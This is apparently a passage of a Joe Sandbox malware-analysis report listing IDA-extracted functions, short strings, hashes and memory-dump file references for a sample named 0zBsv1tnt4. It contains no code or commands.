Associated: 00000000.00000002.1870409069.0000000000BD6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870437096.0000000000BFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870456192.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870456192.0000000000C19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870514658.0000000000C41000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870595383.0000000000C42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870617766.0000000000C43000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870617766.0000000000C48000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870680730.0000000000C58000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_0zBsv1tnt4.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: +$e$+$e$ n l$%r?p$<j:h$=:$DD$N~4|$Xs$e>n<$gd$r:i8$ut$13$=?$b`$tj$uw$y{$|r
API String ID: 237503144-1429676654
Opcode ID: c48459b31d25d87e361f06b4494243216630fce1abf14a492e80c99269ce2b73
Instruction ID: 0d23899440d505d6a877945e1dc568849952f5beb6301bf68bb4ecb0637e973f
Opcode Fuzzy Hash: c48459b31d25d87e361f06b4494243216630fce1abf14a492e80c99269ce2b73
Instruction Fuzzy Hash: 36C20CB560C3848AD334CF54D45279FBAF2FB82300F00892DD5E96B255DBB1864A9B9B

Function 00974560 Relevance: 36.1, APIs: 1, Strings: 19, Instructions: 1081COMMON

Download Yara Rule

Strings

b`, xrefs: 009755F9
|r, xrefs: 009753A8
N~4|, xrefs: 0097593E
13, xrefs: 00975BFC
ut, xrefs: 00975CE3
n l, xrefs: 0097596A
gd, xrefs: 00975E60
y{, xrefs: 00975B36
=?, xrefs: 00975BF1
%r?p, xrefs: 0097595F
r:i8, xrefs: 00975899
Xs, xrefs: 00975CD8
=:, xrefs: 009757CE
e>n<, xrefs: 0097588E
tj, xrefs: 009753BE
DD, xrefs: 00975CEE
uw, xrefs: 00975B57
<j:h, xrefs: 00975975
+$e, xrefs: 0097442B

Memory Dump Source

Source File: 00000000.00000002.1869314685.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1869287260.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869314685.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869373016.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869396177.00000000009AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869421033.00000000009B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869442568.00000000009B1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869565557.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869600432.0000000000B0D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869628952.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869654363.0000000000B29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869679006.0000000000B2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869679006.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869729918.0000000000B46000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869752416.0000000000B48000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869778368.0000000000B61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869810920.0000000000B73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869837743.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869861883.0000000000B93000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869884350.0000000000B94000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869911133.0000000000B98000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869930123.0000000000B99000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869950679.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869973538.0000000000BB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869991607.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870033852.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870074811.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870122737.0000000000BC5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870207205.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870239395.0000000000BCA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870368999.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870389059.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870409069.0000000000BD6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870437096.0000000000BFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870456192.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870456192.0000000000C19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870514658.0000000000C41000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870595383.0000000000C42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870617766.0000000000C43000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870617766.0000000000C48000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870680730.0000000000C58000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_0zBsv1tnt4.jbxd

Similarity

API ID:
String ID: +$e$ n l$%r?p$<j:h$=:$DD$N~4|$Xs$e>n<$gd$r:i8$ut$13$=?$b`$tj$uw$y{$|r
API String ID: 0-3233044194
Opcode ID: 9165c509d6082fd7f2b0a47760c38ff9dc12cfdcff58b2c0f60108ba0ae1b140
Instruction ID: 0f1da65a505594a9c3b4936e9624589031a0a9644d3486701c28ac0c27a6c302
Opcode Fuzzy Hash: 9165c509d6082fd7f2b0a47760c38ff9dc12cfdcff58b2c0f60108ba0ae1b140
Instruction Fuzzy Hash: 5AC20DB560C3848AD334CF58C452BDFBAF2FB82300F00892DD5E96B255DBB546499B9B

Function 009746D0 Relevance: 36.0, APIs: 1, Strings: 19, Instructions: 1047COMMON

Download Yara Rule

Strings

b`, xrefs: 009755F9
|r, xrefs: 009753A8
N~4|, xrefs: 0097593E
13, xrefs: 00975BFC
ut, xrefs: 00975CE3
n l, xrefs: 0097596A
gd, xrefs: 00975E60
y{, xrefs: 00975B36
=?, xrefs: 00975BF1
%r?p, xrefs: 0097595F
r:i8, xrefs: 00975899
Xs, xrefs: 00975CD8
=:, xrefs: 009757CE
e>n<, xrefs: 0097588E
tj, xrefs: 009753BE
DD, xrefs: 00975CEE
uw, xrefs: 00975B57
<j:h, xrefs: 00975975
+$e, xrefs: 0097442B

Memory Dump Source

Source File: 00000000.00000002.1869314685.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1869287260.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869314685.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869373016.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869396177.00000000009AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869421033.00000000009B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869442568.00000000009B1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869565557.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869600432.0000000000B0D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869628952.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869654363.0000000000B29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869679006.0000000000B2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869679006.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869729918.0000000000B46000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869752416.0000000000B48000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869778368.0000000000B61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869810920.0000000000B73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869837743.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869861883.0000000000B93000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869884350.0000000000B94000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869911133.0000000000B98000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869930123.0000000000B99000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869950679.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869973538.0000000000BB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869991607.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870033852.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870074811.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870122737.0000000000BC5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870207205.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870239395.0000000000BCA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870368999.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870389059.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870409069.0000000000BD6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870437096.0000000000BFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870456192.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870456192.0000000000C19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870514658.0000000000C41000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870595383.0000000000C42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870617766.0000000000C43000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870617766.0000000000C48000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870680730.0000000000C58000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_0zBsv1tnt4.jbxd

Similarity

API ID:
String ID: +$e$ n l$%r?p$<j:h$=:$DD$N~4|$Xs$e>n<$gd$r:i8$ut$13$=?$b`$tj$uw$y{$|r
API String ID: 0-3233044194
Opcode ID: e5682fd73a4d071f6b85ae4e039c441a7bad1600dd396cf06a1fc962e842ca4b
Instruction ID: 7ac2bf5fc763be2d81b6a6a8398f747d019719913904a570a3c80bfa4996e2a1
Opcode Fuzzy Hash: e5682fd73a4d071f6b85ae4e039c441a7bad1600dd396cf06a1fc962e842ca4b
Instruction Fuzzy Hash: CAC20BB560C3848AD334CF58C452BDFBAF2FB82300F00892DC5E96B255DBB146499B9B

Function 00961D2B Relevance: 18.0, APIs: 1, Strings: 9, Instructions: 479COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL ref: 00961EC3

Strings

?, xrefs: 00961EE2
y, xrefs: 00961EF2
a, xrefs: 009621E6
[, xrefs: 009621EB
|, xrefs: 00962267
L, xrefs: 00961D8F
^, xrefs: 00962034
p, xrefs: 00962095
8, xrefs: 00961EEA

Memory Dump Source

Source File: 00000000.00000002.1869314685.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1869287260.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869314685.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869373016.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869396177.00000000009AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869421033.00000000009B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869442568.00000000009B1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869565557.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869600432.0000000000B0D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869628952.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869654363.0000000000B29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869679006.0000000000B2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869679006.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869729918.0000000000B46000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869752416.0000000000B48000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869778368.0000000000B61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869810920.0000000000B73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869837743.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869861883.0000000000B93000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869884350.0000000000B94000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869911133.0000000000B98000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869930123.0000000000B99000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869950679.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869973538.0000000000BB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869991607.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870033852.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870074811.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870122737.0000000000BC5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870207205.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870239395.0000000000BCA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870368999.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870389059.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870409069.0000000000BD6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870437096.0000000000BFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870456192.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870456192.0000000000C19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870514658.0000000000C41000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870595383.0000000000C42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870617766.0000000000C43000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870617766.0000000000C48000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870680730.0000000000C58000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_0zBsv1tnt4.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: 8$?$L$[$^$a$p$y$|
API String ID: 237503144-3949209405
Opcode ID: 36d069f39ee354e329644f21dc41bf3d93a39632ba0b3bd5c3bd029b68ca5837
Instruction ID: fdec8312587e7cf42a8f38dfb1346d50ee4a649261d86409444166b63d3ac687
Opcode Fuzzy Hash: 36d069f39ee354e329644f21dc41bf3d93a39632ba0b3bd5c3bd029b68ca5837
Instruction Fuzzy Hash: 2B129D7160C7808BC364DF38C4917AEBBE1AFC5324F194E2EE8D997392D63899459B43

Function 009660E9 Relevance: 17.1, Strings: 13, Instructions: 807COMMON

Download Yara Rule

Strings

ntxE, xrefs: 00966112
qRb`, xrefs: 00966133
*,-", xrefs: 009666EF
t~v:, xrefs: 009661E7
~mfQ, xrefs: 0096613E
JyTK, xrefs: 00966160
L4, xrefs: 00966BA0
w}MI, xrefs: 00966128
{zdy, xrefs: 0096611D
pt}w, xrefs: 009661F2
3F&D, xrefs: 00966273
uqrs, xrefs: 00966AF0
L4, xrefs: 00966780

Memory Dump Source

Source File: 00000000.00000002.1869314685.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1869287260.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869314685.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869373016.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869396177.00000000009AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869421033.00000000009B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869442568.00000000009B1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869565557.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869600432.0000000000B0D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869628952.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869654363.0000000000B29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869679006.0000000000B2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869679006.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869729918.0000000000B46000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869752416.0000000000B48000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869778368.0000000000B61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869810920.0000000000B73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869837743.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869861883.0000000000B93000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869884350.0000000000B94000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869911133.0000000000B98000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869930123.0000000000B99000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869950679.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869973538.0000000000BB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869991607.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870033852.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870074811.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870122737.0000000000BC5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870207205.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870239395.0000000000BCA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870368999.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870389059.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870409069.0000000000BD6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870437096.0000000000BFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870456192.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870456192.0000000000C19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870514658.0000000000C41000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870595383.0000000000C42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870617766.0000000000C43000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870617766.0000000000C48000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870680730.0000000000C58000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_0zBsv1tnt4.jbxd

Similarity

API ID:
String ID: *,-"$3F&D$JyTK$ntxE$pt}w$qRb`$t~v:$uqrs$w}MI${zdy$~mfQ$L4$L4
API String ID: 0-2746398225
Opcode ID: e4689baac319d6d567604e4e99a4b81f867d9eed4a049ee626aef8685deb48c3
Instruction ID: 6ebff2927892bca613bc634e9be395416c9e642af214be333ae5a8264cb82502
Opcode Fuzzy Hash: e4689baac319d6d567604e4e99a4b81f867d9eed4a049ee626aef8685deb48c3
Instruction Fuzzy Hash: 544222B26083508FC725CF28D8917ABB7E6FBD5304F19893DD8D98B256DB359805CB82

Function 0095F60D Relevance: 16.6, APIs: 1, Strings: 8, Instructions: 845COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(?), ref: 0095FDFC

Strings

g, xrefs: 0095F9EA
#, xrefs: 0095F721
6, xrefs: 0095F620
m, xrefs: 0095F8F4
w, xrefs: 0095FAAD
x, xrefs: 0095FBD4
=, xrefs: 0095F978
\, xrefs: 0095FB0F

Memory Dump Source

Source File: 00000000.00000002.1869314685.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1869287260.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869314685.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869373016.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869396177.00000000009AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869421033.00000000009B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869442568.00000000009B1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869565557.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869600432.0000000000B0D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869628952.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869654363.0000000000B29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869679006.0000000000B2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869679006.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869729918.0000000000B46000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869752416.0000000000B48000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869778368.0000000000B61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869810920.0000000000B73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869837743.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869861883.0000000000B93000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869884350.0000000000B94000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869911133.0000000000B98000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869930123.0000000000B99000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869950679.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869973538.0000000000BB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869991607.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870033852.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870074811.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870122737.0000000000BC5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870207205.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870239395.0000000000BCA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870368999.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870389059.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870409069.0000000000BD6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870437096.0000000000BFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870456192.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870456192.0000000000C19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870514658.0000000000C41000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870595383.0000000000C42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870617766.0000000000C43000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870617766.0000000000C48000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870680730.0000000000C58000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_0zBsv1tnt4.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: #$6$=$\$g$m$w$x
API String ID: 237503144-139252074
Opcode ID: ad37f6bec1ab7220b08091104e89e4752f9c7c7110190b802bb765fe82c66d09
Instruction ID: c697c1ae878013de1a0ce49e9b8fed64d66b5a413db9f3ac636a283715f441e8
Opcode Fuzzy Hash: ad37f6bec1ab7220b08091104e89e4752f9c7c7110190b802bb765fe82c66d09
Instruction Fuzzy Hash: D572A13261D7908BD328DB39C85539FBAD2ABD5324F198B3DE8E9C73C1D67889058742

Function 00977740 Relevance: 16.6, Strings: 13, Instructions: 338COMMON

Download Yara Rule

Strings

O=q?, xrefs: 00977F6D
DE, xrefs: 00977FDB
S%g', xrefs: 00977F83
!A/C, xrefs: 00977FD0
}9F;, xrefs: 00977F62
s1z3, xrefs: 00977F4C
P-X/, xrefs: 00977F99
Z)o+, xrefs: 00977F8E
f!V#, xrefs: 00977F78
}5x7, xrefs: 00977F57
1Q>S, xrefs: 00977FA4
$Y)[, xrefs: 00977FBA
r, xrefs: 0097831A

Memory Dump Source

Source File: 00000000.00000002.1869314685.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1869287260.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869314685.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
